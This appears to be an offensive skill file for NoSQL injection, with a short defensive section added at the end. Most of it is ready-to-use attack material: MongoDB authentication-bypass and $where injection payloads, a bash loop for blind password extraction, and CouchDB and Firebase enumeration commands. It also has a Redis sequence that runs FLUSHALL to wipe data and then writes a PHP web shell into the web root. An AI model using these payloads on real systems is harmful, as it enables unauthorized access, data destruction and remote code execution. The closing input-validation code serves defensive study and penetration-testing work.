| name | nosqli |
| description | NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction. |
| metadata | {"when_to_use":"nosql mongodb mongo couch redis firebase $ne $gt $where injection","mitre_attack":"T1190, T1212","subdomain":"injection","upstream_ref":"skills/_corpus/payloads/NoSQL Injection/"} |
NoSQL Injection
NoSQL stores accept queries as JSON / native objects. When user input lands in the query as an object rather than a plain value, the input controls the query structure, not just the value being compared.
1. MongoDB — most common target
Auth bypass

```text
POST /login
{"user": {"$ne": null}, "pass": {"$ne": null}}
{"user": "admin", "pass": {"$gt": ""}}
{"user": "admin", "pass": {"$regex": "^A"}}
```
Server-side JS injection

```json
{"$where": "this.user == 'admin' && sleep(5000)"}
{"$where": "function() { return this.user.length > 0 && this.user.match(/^a/) }"}
```

$where was deprecated in Mongo 4.4 — still appears in legacy.
Operator extraction (blind)

```bash
for char in {a..z}; do
curl -s -X POST $TARGET/login \
-d "{\"user\":\"admin\",\"pass\":{\"\$regex\":\"^${char}\"}}" \
| grep -q "success" && echo "char: $char"
done
```
2. CouchDB

```bash
curl http://target:5984/_all_dbs
curl http://target:5984/_users/_all_docs
```
3. Firebase Realtime Database

```bash
curl https://YOUR-FIREBASE-PROJECT.firebaseio.com/.json
```
4. Redis

```bash
redis-cli -h target -p 6379 INFO
redis-cli -h target FLUSHALL
redis-cli -h target SET dir /var/www/html
redis-cli -h target SET dbfilename shell.php
redis-cli -h target SET payload "<?php system($_GET['c']); ?>"
redis-cli -h target SAVE
```
5. Tools
- NoSQLMap — automated mongo injection (nosqlmap.py)
- mongoaudit — config scanner
- Burp Intruder w/ payloads/NoSQL Injection/ as wordlist
- fuzzdb — has NoSQL payload variants
6. PoC

```bash
curl -s -X POST $TARGET/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": null}, "password": {"$ne": null}}' \
| jq
```
7. Severity

| Bug | Severity |
|---|---|
| Auth bypass via $ne | Critical 9.8 |
| Blind char extraction of all user data | Critical 9.0 |
| $where JS injection → RCE-adjacent (mongo runs the JS) | Critical 9.8 |
| Public CouchDB / Firebase | Critical (depends on data sensitivity) |
| Unauth Redis on internal net | High 7-8 |
8. Defender

```javascript
// Reject anything that is not a plain string before it can reach the query object
if (typeof req.body.user !== 'string') return res.status(400).send();
if (typeof req.body.pass !== 'string') return res.status(400).send();
// Look the user up by name only; compare the password hash in application code, never inside the query
const user = await User.findOne({user: req.body.user}).select('+password');
// Mongoose: drop query fields that are not in the schema
mongoose.set('strictQuery', true);
```
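A fuller version of that type check, added here as an example and not part of the original cheat sheet: it walks the parsed body recursively so nested operator objects and dotted keys are caught, not just top-level ones, and it keeps the password out of the query entirely. The helper names and the sample bodies are assumptions.

```javascript
// Added example, not the original page's code. Assumes an Express-style
// req.body that has already been JSON-parsed. Helper names are hypothetical.

// Walk a parsed JSON value and report any key Mongo would treat as an operator
// ($ne, $gt, $where, $regex, ...) or as a path (dotted key), at any depth,
// including inside arrays.
function containsOperator(value, depth = 0) {
  if (depth > 32) return true;                 // refuse absurdly nested input
  if (Array.isArray(value)) return value.some(v => containsOperator(v, depth + 1));
  if (value !== null && typeof value === 'object') {
    for (const key of Object.keys(value)) {
      if (key.startsWith('$') || key.includes('.')) return true;
      if (containsOperator(value[key], depth + 1)) return true;
    }
  }
  return false;
}

// Build the login lookup from a request body. Returns null when the request
// should be answered with 400. The password never goes into the query: it is
// checked against the stored hash in application code after the user document
// has been loaded, so {"pass": {"$gt": ""}} has nothing to act on.
function buildLoginQuery(body) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) return null;
  if (containsOperator(body)) return null;     // {"$ne": null} and friends
  const { user, pass } = body;
  if (typeof user !== 'string' || typeof pass !== 'string') return null;
  if (user.length === 0 || user.length > 64) return null;
  return { user };                             // plain equality match only
}

// Constructed sample bodies (not real traffic) run through the check; the
// first three are the bypass payloads from section 1, the last is a normal login.
function auditSamples() {
  const samples = [
    { user: { $ne: null }, pass: { $ne: null } },
    { user: 'admin', pass: { $gt: '' } },
    { user: 'admin', pass: { $regex: '^A' } },
    { user: 'admin', pass: 'hunter2' },
  ];
  return samples.map(b => (buildLoginQuery(b) === null ? 'reject' : 'accept'));
}
```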
Cross-references
- Upstream catalog: skills/_corpus/payloads/NoSQL Injection/
- SQLi (different attack class, similar mindset): skills/exploit/web/sqli.md